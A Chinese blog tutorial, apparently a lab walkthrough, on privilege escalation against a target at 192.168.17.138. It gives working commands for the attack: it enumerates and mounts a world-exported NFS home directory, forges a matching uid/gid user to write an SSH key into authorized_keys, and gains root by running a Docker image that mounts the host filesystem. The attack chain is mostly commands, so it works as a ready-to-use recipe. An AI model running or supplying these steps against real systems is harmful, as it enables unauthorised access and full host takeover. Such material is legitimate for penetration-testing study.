第三方服务提权

发布于:2023-09-14 ⋅ 阅读:(125) ⋅ 点赞:(0)

 nfs挂载原理

目标机器192.168.17.138 开启2049 nfs端口

查看目标开放的文件夹

showmount -e 192.168.17.138

回显:/home/peter *  说明可挂载/home/peter的所有目录

 使用WinSCP链接靶机192.168.17.138  

更改名字为 authorized_keys

 靶机

赋值权限

攻击机

nfs挂载提权实例

mount 192.168.17.138:/home/peter /nsq

查看是否挂载成功 

 该处为1001:1005

  创建用户 

在本机创建一个peter用户并且uid为1001  gid为1005即可
创建组并指定组GID:
groupadd -g 1005 peter

创建用户并指定uid以及gid:
adduser peter -uid 1001 -gid 1005

 sudo提权

修改用户的sudoers权限 

vim /etc/sudoers

 

添加peter  ALL=(ALL:ALL)ALL

查看用户权限 

 cat /etc/passwd  

发现用户权限为1001:1005,成功 

进入peter用户 

 生成密钥

ssh-keygen

 保存公钥到创建的目录下

cat /home/peter/.ssh/id_rsa.pub > /nsq/.ssh/authorized_keys  

赋值权限

chmod 700 .ssh
chmod 600 authorized_keys

链接成功

docker用户组提权

peter用户属于docker组,docker组的成员,那么可以根据此漏洞来获取root的shell

docker run -v /:/hostOS -i -t chrisfosterelli/rootplease


网站公告

今日签到

点亮在社区的每一天
去签到